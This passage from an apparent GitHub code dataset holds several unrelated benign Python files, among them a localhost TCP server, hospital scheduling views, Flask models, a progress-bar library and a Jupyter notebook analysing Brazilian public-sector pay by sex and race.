socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.bind(('localhost', 1234))\ns.listen(5)\n\nwhile True:\n client, addr = s.accept()\n print(f'Connection from {addr}')\n client.send('Hello from server'.encode('utf-8'))\n client.close()\n","repo_name":"jasieqb/pas","sub_path":"cw5/z4/tcp/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"38322986313","text":"__author__ = \"Benedict Thompson\"\n__version__ = \"0.1p\"\n\nimport setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"automod\",\n version=__version__,\n author=__author__,\n author_email=\"thomp334@uni.coventry.ac.uk\",\n description=\"An auto-moderator chat-bot\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/4006G2/AutoMod\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)\n","repo_name":"4006G2/AutoMod","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"21201270814","text":"# We iterate trough the lists at the same time\n# reusing nodes and placing them in the correct sorte order\n# Time: O(n+m)\n# Space: O(1) as we reuse nodes\n\nclass ListNode:\n def __init__(self, data = 0, next_node = None):\n self.data = data\n self.next = next_node\n\ndef merge_two_sorted_lists(L1, L2):\n # Create a dummy placeholder\n dummy_head = tail = ListNode()\n\n while L1 and L2:\n if L1.data < L2.data:\n tail.next, L1 = L1, L1.next\n else:\n tail.next, L2 = L2, L2.next\n\n tail = tail.next\n\n# Append remaining nodes of L1 or L2\n tail.next = L1 or L2\n return 
dummy_head.next","repo_name":"pablomdd/EPI","sub_path":"Linked_Lists/7_1_merge_two_sorted_linked_lists.py","file_name":"7_1_merge_two_sorted_linked_lists.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"15376691890","text":"import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom doctor_schedule.models import ScheduleResource\n\nfrom laboratory.utils import current_time\nfrom doctor_schedule.sql_func import get_resource_by_research_hospital, get_slot_plan_by_hosp_resource, get_hospital_resource_by_research, get_slot_fact\nfrom doctor_schedule.sql_func import get_date_slots_for_many_resource\nfrom laboratory.settings import FORWARD_DAYS_SCHEDULE\nfrom plans.models import PlanHospitalization\nfrom utils.dates import try_strptime\n\n\ndef get_hospital_resource():\n hospital_resource = get_resource_by_research_hospital()\n hospital_resource_pk = [i.scheduleresource_id for i in hospital_resource]\n resource_researches = {}\n for i in hospital_resource:\n if not resource_researches.get(i.scheduleresource_id, None):\n resource_researches[i.scheduleresource_id] = {\"researches_id\": i.researches_id, \"title\": i.schedule_title or i.title, \"short_title\": i.short_title}\n\n d1 = current_time(only_date=True)\n d2 = d1 + relativedelta(days=FORWARD_DAYS_SCHEDULE)\n date_start = datetime.datetime.combine(d1, datetime.time.min)\n date_end = datetime.datetime.combine(d2, datetime.time.max)\n slot_plan_for_hospital = get_slot_plan_by_hosp_resource(date_start, date_end, tuple(hospital_resource_pk))\n resource_has_slot = set([sl.resource_id for sl in slot_plan_for_hospital])\n final_hosp_researches_has_slot = []\n for rslot in resource_has_slot:\n if resource_researches.get(rslot):\n temp_data = resource_researches.get(rslot)\n temp_data[\"resource_id\"] = rslot\n final_hosp_researches_has_slot.append(temp_data.copy())\n\n return final_hosp_researches_has_slot\n\n\ndef get_available_hospital_plans(research_pk, resource_id=None, date_start=None, date_end=None):\n if date_start and date_end:\n d1 = try_strptime(f\"{date_start}\", formats=('%Y-%m-%d',))\n d2 = try_strptime(f\"{date_end}\", formats=('%Y-%m-%d',))\n else:\n d1 = current_time(only_date=True) + relativedelta(days=1)\n d2 = d1 + relativedelta(days=FORWARD_DAYS_SCHEDULE)\n\n if resource_id is None:\n resource_id = tuple(ScheduleResource.objects.filter(service__in=[research_pk]).values_list('pk', flat=True))\n elif isinstance(resource_id, tuple):\n resource_id = resource_id\n elif isinstance(resource_id, list):\n resource_id = tuple(resource_id)\n else:\n resource_id = tuple([resource_id])\n\n if not resource_id:\n return {}, {}\n\n counts = {}\n\n start_date = datetime.datetime.combine(d1, datetime.time.min)\n end_date = datetime.datetime.combine(d2, datetime.time.max)\n result_slot = get_slot_plan_by_hosp_resource(start_date, end_date, resource_id)\n date_slots = {}\n for rslots in result_slot:\n if not date_slots.get(rslots.date_char, None):\n date_slots[rslots.date_char] = [rslots.datetime]\n else:\n temp_date_slots = date_slots.get(rslots.date_char, None)\n temp_date_slots.append(rslots.datetime)\n date_slots[rslots.date_char] = temp_date_slots.copy()\n date_available_status = {}\n\n date_i = start_date - datetime.timedelta(days=1) # ЦИТО можно записать на сегодня\n while date_i < end_date:\n date_s = date_i.strftime(\"%Y-%m-%d\")\n date_available_status[date_s] = False\n date_i += datetime.timedelta(days=1)\n\n for 
current_date, slots_in_date in date_slots.items():\n d1 = try_strptime(current_date, formats=('%Y-%m-%d',))\n start_date = datetime.datetime.combine(d1, datetime.time.min)\n end_date = datetime.datetime.combine(d1, datetime.time.max)\n current_plan_count = (\n PlanHospitalization.objects.filter(exec_at__range=(start_date, end_date), work_status__in=[0, 1, 3], action=0, research_id=research_pk).order_by(\"exec_at\").count()\n )\n counts[current_date] = {\n \"available\": len(slots_in_date),\n \"used\": current_plan_count,\n }\n date_available_status[current_date] = counts[current_date][\"available\"] > counts[current_date][\"used\"]\n\n return date_available_status, counts\n\n\ndef check_available_hospital_slot_before_save(research_pk, resource_id, date):\n if not research_pk or not date:\n return False\n d = try_strptime(f\"{date}\", formats=('%Y-%m-%d',))\n start_date = datetime.datetime.combine(d, datetime.time.min)\n end_date = datetime.datetime.combine(d, datetime.time.max)\n if resource_id is None:\n resource_id = tuple(ScheduleResource.objects.filter(service__in=[research_pk]).values_list('pk', flat=True))\n elif isinstance(resource_id, tuple):\n resource_id = resource_id\n elif isinstance(resource_id, list):\n resource_id = tuple(resource_id)\n else:\n resource_id = tuple([resource_id])\n\n if not resource_id:\n return False\n\n result_slot = get_slot_plan_by_hosp_resource(start_date, end_date, resource_id)\n date_slots = [i.hhmm_char for i in result_slot]\n current_plan_count = PlanHospitalization.objects.filter(exec_at__range=(start_date, end_date), work_status=0, action=0, research_id=research_pk).order_by(\"exec_at\").count()\n return len(date_slots) > current_plan_count\n\n\ndef get_available_hospital_resource_slot(research_pk, date_start, date_end, allow_cito=False):\n d1 = try_strptime(f\"{date_start}\", formats=('%Y-%m-%d',))\n d2 = try_strptime(f\"{date_end}\", formats=('%Y-%m-%d',))\n start_date = datetime.datetime.combine(d1, datetime.time.min)\n end_date = datetime.datetime.combine(d2, datetime.time.max)\n result = {\"dates\": {}}\n\n if end_date < datetime.datetime.combine(try_strptime(current_time().strftime(\"%Y-%m-%d\"), formats=('%Y-%m-%d',)), datetime.time.max):\n return result\n\n resource_hosp = get_hospital_resource_by_research(research_pk)\n structure_resource = {rh.scheduleresource_id: rh.resource_title for rh in resource_hosp}\n\n resource_tuple = tuple(structure_resource.keys())\n slot_plans = get_date_slots_for_many_resource(start_date, end_date, resource_tuple)\n slot_plan_pks = tuple([slplan.slot_id for slplan in slot_plans])\n slot_plan_busy_slot_fact = get_slot_fact(slot_plan_pks)\n slot_plan_busy_slot_fact = [i.plan_id for i in slot_plan_busy_slot_fact]\n data = result[\"dates\"]\n dates = set([slotplan.date_char for slotplan in slot_plans])\n for d in dates:\n data[d] = []\n\n temp_data_slot_resource = {}\n for slotplan in slot_plans:\n if slotplan.slot_id in slot_plan_busy_slot_fact:\n continue\n if not temp_data_slot_resource.get(slotplan.resource_id):\n temp_data_slot_resource[slotplan.resource_id] = {slotplan.date_char: [{\"pk\": slotplan.slot_id, \"title\": f\"{slotplan.start_slot} - {slotplan.end_slot}\"}]}\n else:\n temp_slot_resource_date = temp_data_slot_resource.get(slotplan.resource_id, None)\n if not temp_slot_resource_date.get(slotplan.date_char):\n temp_slot_resource_date[slotplan.date_char] = [{\"pk\": slotplan.slot_id, \"title\": f\"{slotplan.start_slot} - {slotplan.end_slot}\"}]\n else:\n temp_slot_resource_data = 
temp_slot_resource_date.get(slotplan.date_char)\n temp_slot_resource_data.append({\"pk\": slotplan.slot_id, \"title\": f\"{slotplan.start_slot} - {slotplan.end_slot}\"})\n temp_slot_resource_date[slotplan.date_char] = temp_slot_resource_data.copy()\n temp_data_slot_resource[slotplan.resource_id] = temp_slot_resource_date.copy()\n\n for k, v in temp_data_slot_resource.items():\n for date, slots in v.items():\n temp_data = data.get(date)\n temp_data.append({\"resourcePk\": k, \"resourceTitle\": structure_resource.get(k, \"\"), \"slots\": slots})\n data[date] = temp_data.copy()\n\n if allow_cito:\n dates = []\n date_i = start_date\n while date_i < end_date:\n date = date_i.strftime(\"%Y-%m-%d\")\n if date not in data:\n data[date] = []\n has_resources = {x['resourcePk']: x for x in data[date]}\n for rpk in resource_tuple:\n if rpk in has_resources:\n has_resources[rpk]['slots'].append({\"pk\": -10, \"title\": \"CITO\"})\n continue\n temp_data = {\"resourcePk\": rpk, \"resourceTitle\": structure_resource.get(rpk, \"\"), \"slots\": [{\"pk\": -10, \"title\": \"CITO\"}]}\n data[date].append(temp_data)\n\n date_i += datetime.timedelta(days=1)\n return result\n\n\ndef get_available_slots_of_dates(research_pk, date_start, date_end, allow_cito=False):\n d1 = try_strptime(f\"{date_start}\", formats=('%Y-%m-%d',))\n d2 = try_strptime(f\"{date_end}\", formats=('%Y-%m-%d',))\n current_date = try_strptime(current_time().strftime(\"%Y-%m-%d\"), formats=('%Y-%m-%d',))\n start_date = datetime.datetime.combine(d1, datetime.time.min)\n end_date = datetime.datetime.combine(d2, datetime.time.max)\n\n if end_date < datetime.datetime.combine(current_date, datetime.time.max):\n return {}\n\n if start_date < datetime.datetime.combine(current_date, datetime.time.min):\n start_date = datetime.datetime.combine(current_date, datetime.time.min) + datetime.timedelta(days=1)\n\n if allow_cito:\n data = {}\n date_i = start_date - datetime.timedelta(days=1) # ЦИТО можно записать на сегодня\n while date_i < end_date:\n date_s = date_i.strftime(\"%Y-%m-%d\")\n data[date_s] = True\n date_i += datetime.timedelta(days=1)\n return data\n\n resource_hosp = get_hospital_resource_by_research(research_pk)\n structure_resource = {rh.scheduleresource_id: rh.resource_title for rh in resource_hosp}\n\n resource_tuple = tuple(structure_resource.keys())\n slot_plans = get_date_slots_for_many_resource(start_date, end_date, resource_tuple)\n slot_plan_pks = tuple([slplan.slot_id for slplan in slot_plans])\n slot_plan_busy_slot_fact = get_slot_fact(slot_plan_pks)\n slot_plan_busy_slot_fact = [i.plan_id for i in slot_plan_busy_slot_fact]\n data = {}\n\n for slotplan in slot_plans:\n if slotplan.slot_id in slot_plan_busy_slot_fact or slotplan.date_char in data:\n continue\n data[slotplan.date_char] = True\n\n return data\n","repo_name":"moodpulse/l2","sub_path":"doctor_schedule/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10362,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"4"} +{"seq_id":"12987955687","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\n\nclass SelectById():\n def locate_by_id(self):\n driver = webdriver.Chrome()\n driver.get('https://facebook.com')\n\n h2 = driver.find_element(By.TAG_NAME, 'h2')\n print(h2.text)\n\n # lista = driver.find_elements(By.TAG_NAME, 'a')\n # for i in lista:\n # print(i.text)\n\n # driver.current_url\n # driver.back back to previous page\n # driver.forward() back to next page\n # 
driver.refresh() refreshes the page\n # driver.title\n # driver.get()\n # driver.maximize_window()\n # driver.minimize_window()\n # driver.fullscreen_window() F11\n # driver.close() closes only the current tab\n # driver.quit() closes the whole browser\n time.sleep(500)\n\nfindbyid = SelectById()\nfindbyid.locate_by_id()","repo_name":"hardcoregor/python-learn","sub_path":"2nd lesson Big Course/2.functionsSelenium.py","file_name":"2.functionsSelenium.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"74284313075","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Remuneração líquida média mensal no Executivo civil federal ativo, por sexo e raça (1999-2020)\n# \n# 
\n# \n# \n\n# ### Descrição da base de dados\n# Neste documento, encontra-se dados que constam a média mensal da remuneração líquida de servidores públicos ativos no Executivo Civil Federal. Os 88 (Oitenta e oito) indivíduos inclusos nesta pesquisa, que consta dados entre os anos 1999 e 2020, estão classificados em dois parâmetros: Sexo e Raça. \n# As características supracitadas serão estudadas posteriormente para auxiliar numa análise exploratória desses dados.\n# Fonte: https://www.ipea.gov.br/atlasestado/filtros-series/28/vinculos-e-remuneracoes-por-sexo\n# \n# \n\n# ## Definição dos dados\n#
\n\n# Primeiramente, é preciso importar as bibliotecas do Python que serão úteis desde a organização dos dados até a análise dos dados com auxílio de gráficos, como Pandas, NumPy, Matplotlib e Seaborn. \n# \n# Assim, logo usa-se o Pandas ('pd') para a leitura em DataFrame do arquivo a ser analisado.\n\n# In[2]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nget_ipython().run_line_magic('matplotlib', 'inline')\ndata = pd.read_csv('5233-liquidosexoraca (1).csv', sep=';', quotechar = '\"', encoding= 'utf8')\ndata\n\n\n# In[3]:\n\n\n# Para melhor visualização adiante, retirei a primeira coluna\ndata = data[['ano', 'sexo_raça', 'liquido']]\ndata.head()\n\n\n# In[17]:\n\n\ndata.head() #Esse comando é usado para ver apenas o início dos DataFrames\n\n\n# ### Dicionário de dados\n# A seguir, consta um dicionário de dados, no qual há um DataFrame nomeado como \"dicionario\" que contém as variáveis e seus respectivos nomes, descrições e classificações com o intuito de elucidar o que está contido dentro do dataset a ser analisado. O objetivo principal é prover um melhor entendimento sobre os dados fornecidos.\n\n# In[18]:\n\n\n\ndicionario = {'Nome da variável' : [ 'Ano', 'Sexo e Raça', 'Salário Liquido'],\n 'Tipo de variavel' : ['Numérico', 'Nominal','Numérico'],\n 'Descrição da variável' : ['Ano da coleta', 'Sexo e Raça do indivíduo', 'Salário liquido mensal do indivíduo']\n }\ndicionario = pd.DataFrame(data = dicionario)\ndicionario\n\n\n# ## Preparação dos dados\n#
\n# \n# Nesta etapa, os dados devem ser bem organizados e limpos, ou seja, será feito a eliminação de duplicações ou outliers e de valores ausentes.\n# \n# A seguir foi utilizado um recurso do Pandas que remove os valores nulos, ou seja, os valores ausentes do DataFrame. Esses valores são nomeados como 'NaN' (Not a Number).\n\n# In[19]:\n\n\ndata.isnull()\n\n\n# Ao executar essa função, verifica-se os dados nulos em cada coluna. Assim, ao ver o valor booleano \"False\" quer dizer que há dados atribuidos, se houver \"True\", não há dados.\n\n# In[20]:\n\n\ndata.isnull().sum() #Aqui, conta-se a quantidade de números ausentes\n\n\n# Portanto, vemos que não há valores ausentes nas colunas.\n\n# In[21]:\n\n\ndata.duplicated() \n#Para verificar se há dados duplicados, se houver algum dado duplicado, aparecerá \"True\".\n\n\n# In[22]:\n\n\ndata = data.dropna() \ndata\n\n\n# Vemos que não há dados duplicados. Assim, com dados limpos, seguimos para a análise desses dados.\n\n# # Análise exploratória de dados\n#
\n# \n\n# \n# \n# ### Há alguma discrepância na remuneração mensal quando compara-se a média salarial de cada grupo?\n# \n\n# In[39]:\n\n\ndata.head()\n\n\n# In[24]:\n\n\ndata.info()\n\n\n# Ao verificar os tipos de cada variável nas colunas, vemos que 'sexo_raça' e 'liquido' são lidas como objetos. No entanto, a variável 'liquido' precisa ser reocnhecida como um tipo numérico com casa decimal, para que a analise a ser feita não seja prejudicada. \n\n# In[6]:\n\n\ndata['liquido'] = data['liquido'].str.replace(',','.').astype(float)\n\n\n# In[7]:\n\n\ndata.info()\n\n\n# A seguir, iremos juntar todos os dados contido nos 4 tipos de 'sexo_raça' classificados e observar, em média, a remuneração de cada um. \n\n# In[9]:\n\n\nA1 = data.groupby(['sexo_raça'])['liquido'].mean().reset_index()\nA1['liquido'] = round(A1['liquido'],2) \nA1\n\n\n# In[18]:\n\n\n#Com os dados obtidos, será gerado um gráfico\nf, ax1 = plt.subplots(figsize=(7, 5))\nax1 = sns.barplot(data = A1 ,x= 'sexo_raça', y='liquido')\nplt.xlabel('Raça e Sexo', color = 'darkblue', size = 15)\nplt.ylabel('Remuneração Média (Real)', color = 'darkblue', size = 15)\nplt.title('Remuneração Média (Real) de invidívuos do setor público tendo como parâmetro Raça e Sexo ', size = 20)\n\n\n# Observa-se que a média salarial entre os indivíduos acima, de acordo com tais parâmetros (Raça e Sexo), entre os anos 1999 e 2000, evidencia-se que homens brancos possuem, com uma grande vantagem, uma média salarial maior em relação aos demais.\n# Vemos que há uma discrepância bastante significativa quando se compara a média salarial de homens brancos com a de mulheres negras. Está exposto que mesmo havendo mulheres negras capazes de exercer funções no mesmo cargo que um homem branco, o mercado de trabalho as subestima. Assim como o gênero é visto explicitamente como um fator não favorável, a raça também é um outro paramâmetro a se considerar, pois vemos que mesmo sendo homem, a média salarial de homems negros é surpreendentemente menor que a de mulheres brancas.\n# \n# \n# A cultura machista e racista afeta uma grande parcela da população que não se encaixa nos padrões historicamente instaurados na nossa sociedade, observamos frequentemente como a desigualdade entre raça e gênero podem ser um aspecto que determina como essas pessoas vão ser inseridas no mercado de trabalho, quais cargos ocuparam e quais serão seus salários. Esses fatores de discriminação são vistos quando a participação de homens brancos no mercado de trabalho é elevado em comparação com a atuação de mulheres, e quando comparados a homens e mulheres negras essa diferença se destaca ainda mais. Por isso, os dados são importantes para comprovar que a reprodução de tais aos racistas e sexistas.\n# \n# \n# No Brasil, as desigualdades de gênero e raça não são fenômenos que estão referidos a \"minorias\" ou a grupos específicos da sociedade. Pelo contrário, são problemas que dizem respeito às grandes maiorias da população: segundo os dados da Pesquisa Nacional por Amostra de Domicílios (PNAD) 2003, as mulheres representam 43% da População Economicamente Ativa (PEA) no Brasil e os negros (de ambos os sexos) representam 46%. Somados, correspondem a aproximadamente 70% da PEA (60 milhões de pessoas). 
Black women, in turn, correspond to more than 15 million people (18% of the PEA) and, as a result of a double discrimination (of gender and race), face systematic disadvantage in all the main social and labour-market indicators (ABRAMO, LAÍS 2006).\n# \n\n# ### The trend over the years among individuals of different sex and race\n# \n\n# In[87]:\n\n\ndata.head()\n\n\n# In[24]:\n\n\nhomembranco = data.loc[data['sexo_raça']== 'Homem Branco']\n\n\n# In[50]:\n\n\nhomembranco # a separate dataframe with all the data on white men\n\n\n# In[20]:\n\n\nmulhernegra = data.loc[data['sexo_raça']== 'Mulher Negra']\n\n\n# In[51]:\n\n\nmulhernegra # a separate dataframe with all the data on black women\n\n\n# In[82]:\n\n\nmulhernegra.plot(x = \"ano\", y = \"liquido\",\n grid = True,\n legend = True, label = 'Pay in R$',\n marker = \".\",\n markersize = 5,\n colormap = \"viridis\",\n xlabel = \"Years\", color= 'darkgreen',\n ylabel= \"Pay in BRL\",\n title = \"Salary of black women between 1999 and 2020\")\n\n\n# In[79]:\n\n\nhomembranco.plot(x = \"ano\", y = \"liquido\",\n grid = True,\n legend = True, label = 'Pay in R$',\n marker = \".\", \n color= 'red',\n markersize = 5, \n xlabel = \"Years\", \n ylabel= \"Pay in BRL\",\n title = \"Salary of white men between 1999 and 2020\")
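\n\n# Aside added for clarity (not in the original notebook): drawing both groups on one axis makes the gap easier to read. A sketch, assuming the homembranco and mulhernegra dataframes defined above:\n\n# In[ ]:\n\n\n# ax = homembranco.plot(x = \"ano\", y = \"liquido\", label = 'White men', color = 'red', marker = \".\")\n# mulhernegra.plot(x = \"ano\", y = \"liquido\", label = 'Black women', color = 'darkgreen', marker = \".\",\n# ax = ax, grid = True, xlabel = \"Years\", ylabel = \"Pay in BRL\",\n# title = \"Salary comparison between 1999 and 2020\")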
\n\n\n# In the federal civil executive branch, the 2004-2015 period saw a peak of salary growth for both black women and white men; the charts, however, still show that the pay gap persists. Men went on earning more and more, reaching a salary above R$8,500.00 in 2020, while black women's pay does not rise above R$6,000.00.\n# \n# According to the MEC, a project to implement quotas appeared in 2004 and the law was enacted in 2012. This explains the peak between the years above: it opened university entry to black people, which contributed to raising everyone's salaries, including those of black women.\n# \n# This shows that even almost 10 years of affirmative policies, enabling black people to occupy spaces previously held mostly by white men, have not been enough to repair the historical inequality of gender and, above all, race. Finally, it shows that we must keep fighting for labour-market policies that reduce this pay gap and bring about effective change.\n# \n# \n# Source: http://portal.mec.gov.br/component/tags/tag/politica-de-cotas\n","repo_name":"AnaSBrandao/Remunera-o-l-quida-m-dia-mensal-no-Executivo-civil-federal-ativo-por-sexo-e-ra-a-1999-2020-","sub_path":"Remuneração líquida média mensal no Executivo civil federal ativo, por sexo e raça (1999-2020).py","file_name":"Remuneração líquida média mensal no Executivo civil federal ativo, por sexo e raça (1999-2020).py","file_ext":"py","file_size_in_byte":9555,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"29190621927","text":"from flask_migrate import Migrate\nimport datetime\nfrom sqlalchemy import Column, String, Integer, DateTime, ForeignKey\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy.orm import relationship, backref\nimport timeago\ndb = SQLAlchemy()\nnow = datetime.datetime.now() + datetime.timedelta(seconds=60 * 3.4)\n\n'''\nsetup_db(app)\n binds a flask application and a SQLAlchemy service\n'''\n\n\ndef setup_db(app):\n app.config.from_object('config')\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n db.app = app\n Migrate(app, db)\n db.init_app(app)\n db.create_all()\n\n\n'''\nWorkout\n\n'''\n\n\nclass Workout(db.Model):\n __tablename__ = 'workouts'\n\n id = Column(Integer, primary_key=True)\n type = Column(String)\n icon = Column(String)\n totalTime = Column(String)\n totalCal = Column(String)\n activeCal = Column(Integer)\n heart = Column(Integer)\n created_at = Column(DateTime, default=datetime.datetime.utcnow)\n\n def __init__(self, type, icon, totalTime, totalCal, activeCal, heart, created_at):\n self.type = type\n self.icon = icon\n self.totalTime = totalTime\n self.totalCal = totalCal\n self.activeCal = activeCal\n self.heart = heart\n self.created_at = created_at\n\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n def format(self):\n return {\n 'id': self.id,\n 'type': self.type,\n 'icon': self.icon,\n 'totalTime': self.totalTime,\n 'totalCal': self.totalCal,\n 'activeCal': self.activeCal,\n 'heart': self.heart,\n 'created_at': timeago.format(self.created_at, now)\n }\n\n\n\n'''\nUser\n\n'''\n\n\nclass User(db.Model):\n __tablename__ = 'users'\n\n id = Column(Integer, primary_key=True)\n name = Column(String)\n dob = Column(DateTime, default=datetime.datetime.utcnow)\n blod = Column(String)\n health = Column(String)\n water = Column(String)\n moveGoal = Column(Integer)\n excersiceGoal = Column(Integer)\n standGoal = Column(Integer)\n\n\n def __init__(self, name, dob, blod, health, water, moveGoal, excersiceGoal, standGoal):\n self.name = name\n self.dob = dob\n self.blod = blod\n self.health = health\n self.water = water\n self.moveGoal = moveGoal\n self.excersiceGoal = excersiceGoal\n self.standGoal = standGoal\n\n\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n def update(self):\n db.session.commit()\n\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n\n def format(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'blod': self.blod,\n 'health': self.health,\n 'water': self.water,\n 'moveGoal': self.moveGoal,\n 'excersiceGoal': self.excersiceGoal,\n 'standGoal': self.standGoal,\n
}\n","repo_name":"iMishaDev/udacity-activities","sub_path":"flask-sqlalchemy-activity/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"4"} +{"seq_id":"38897411675","text":"mi_conjunto = {1, 2, 3}\n\n# Agregar elementos al conjunto\n\nmi_conjunto.add(4)\nprint(mi_conjunto) # Output: {1, 2, 3, 4}\n\n# Eliminar elementos del conjunto\nmi_conjunto.remove(2)\nprint(mi_conjunto) # Output: {1, 3, 4}\n\nconjunto1 = {1, 2, 3}\nconjunto2 = {3, 4, 5}\n\n# Unión de conjuntos\nunion = conjunto1.union(conjunto2)\nprint(union) # Output: {1, 2, 3, 4, 5}\n\n# Intersección de conjuntos\ninterseccion = conjunto1.intersection(conjunto2)\nprint(interseccion) # Output: {3}\n\n# Diferencia de conjuntos\ndiferencia = conjunto1.difference(conjunto2)\nprint(diferencia) # Output: {1, 2}\n","repo_name":"JPalacio3/Escuela_Desarrollo_de_Software_Basico.","sub_path":"PYTHON/03-ESTRUCTURAS DE CONTROL/conjuntos.py","file_name":"conjuntos.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"4162692453","text":"\"\"\"\nDescription: higher api for pb (progress bar).py\nversion:\nAuthor: TianyuYuan\nDate: 2021-03-26 13:44:18\nLastEditors: TianyuYuan\nLastEditTime: 2021-04-06 21:20:09\n\"\"\"\nfrom concurrent.futures import ThreadPoolExecutor, as_completed\nfrom functools import partial\nfrom tykit.progressbar import ProgressBar\n\n\n# * * * * * * * * * * * * * * * * * * * * * * * #\n# * Higher API for progressbar * #\n# * * * * * * * * * * * * * * * * * * * * * * * #\n\ndef pb_iter(iter_files):\n \"\"\"生成器,将可迭代对象填入,在生成element的同时显示迭代的进度\"\"\"\n pb = ProgressBar(\"iter\", len(iter_files))\n for i,element in enumerate(iter_files):\n pb.print_progressbar(i)\n yield element\n\n\ndef pb_range(*args):\n \"\"\"可显示迭代进度的range(),功能用法与range相同\n \"\"\"\n iter_files = range(*args)\n return pb_iter(iter_files)\n\n\ndef pb_multi_thread(workers: int, task, iter_files) -> list:\n \"\"\"显示多进程进度条\n - workers: 指定多进程的max_workers\n - task: 任务函数\n - iter_files: 填入要处理的可迭代对象\n - return: 返回每个job的结果,并存入list返回\n \"\"\"\n pb = ProgressBar(task, len(iter_files))\n result = []\n with ThreadPoolExecutor(max_workers=workers) as pool:\n job_list = []\n for task_input in iter_files:\n job = pool.submit(task, task_input)\n job_list.append(job)\n i = 0\n for done_job in as_completed(job_list):\n i += 1\n result.append(done_job.result())\n pb.print_progressbar(i)\n return result\n\n\ndef pb_multi_thread_partial(workers: int, task, iter_files, **kwargs):\n \"\"\"显示多进程进度条,针对具有多参数的任务\n - workers: 指定多进程的max_workers\n - task: 任务函数\n - iter_files: 填入要处理的可迭代对象\n - **kwargs: 填入'keyword=constant_object....'\n - return: 返回每个job的结果,并存入list返回\n \"\"\"\n new_task = partial(task, **kwargs)\n new_task.__name__ = task.__name__\n return pb_multi_thread(workers, new_task, iter_files)\n\n\n# ! * * * * * * * * * * * * * * * * * * * * * * #\n# ! Test Cases & Examples * #\n# ! 
\n\n\n# ! * * * * * * * * * * * * * * * * * * * * * * #\n# ! Test Cases & Examples * #\n# ! * * * * * * * * * * * * * * * * * * * * * * #\ndef square_a_num(x):\n \"\"\"Task function\"\"\"\n import time\n time.sleep(0.05)\n return x * x\n\n\ndef multi_param_task(x, a, b, c):\n \"\"\"Task function with several parameters\"\"\"\n return x + a + b + c\n\n\ndef pb_range_testcase(*args):\n result = []\n for i in pb_range(*args):\n result.append(square_a_num(i))\n # print(result)\n\n\ndef pb_simple_iter_testcase(x):\n result = []\n for i in pb_iter(range(x)):\n result.append(square_a_num(i))\n # print(result)\n\n\ndef pb_multi_thread_testcase(x):\n iter_files = range(x)\n result = pb_multi_thread(10, square_a_num, iter_files)\n # print(result)\n\n\ndef pb_multi_thread_partial_testcase(x, a, b, c):\n iter_files = range(x)\n result = pb_multi_thread_partial(10, multi_param_task, iter_files, a=a, b=b, c=c)\n # print(result)\n\nif __name__ == \"__main__\":\n from time import sleep\n for i in pb_range(1000):\n sleep(0.01)\n","repo_name":"paperplane110/tykit","sub_path":"tykit/pb_api.py","file_name":"pb_api.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"20958861622","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport csv\nimport os\nimport pandas as pd\nimport numpy as np\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport openpyxl\nimport time\n\n#################################### Helper methods ###################################\n\n# Collect the full paths of all files under dir\ndef get_filelist(dir):\n\t\tfullnamelist=[]\n\t\tfor home, dirs, files in os.walk(dir):\n\t\t\t\tfor filenamelist in files:\n\t\t\t\t\t\tfullnamelist.append(os.path.join(home, filenamelist))\n\t\treturn fullnamelist\n\n#################################### Helper methods ###################################\n\nif __name__ == \"__main__\":\n\t\tmeta_10=[]\n\t\tlogpath=get_filelist(os.getcwd())\n\t\tcreat_file= os.path.join(os.getcwd()+\"\\\\output\")\n\t\tprint(os.path.exists(creat_file))\n\t\tif os.path.exists(creat_file) == False:\t\n\t\t\tos.makedirs(creat_file,exist_ok=True) # with exist_ok=False, makedirs raises FileExistsError if the directory already exists; with exist_ok=True it does not\n\t\tprint(logpath)\n\t\tfor i in range(len(logpath)):\n\t\t\tif \".csv\" in logpath[i] and \"IMEI.csv\" not in logpath[i] and \"result\" not in logpath[i]:\n\t\t\t\tprint(\"Parsing file path:\",logpath[i])\n\t\t\t\tdf1 = pd.read_csv(logpath[i],encoding='gbk')\n\t\t\t\tdf2 = 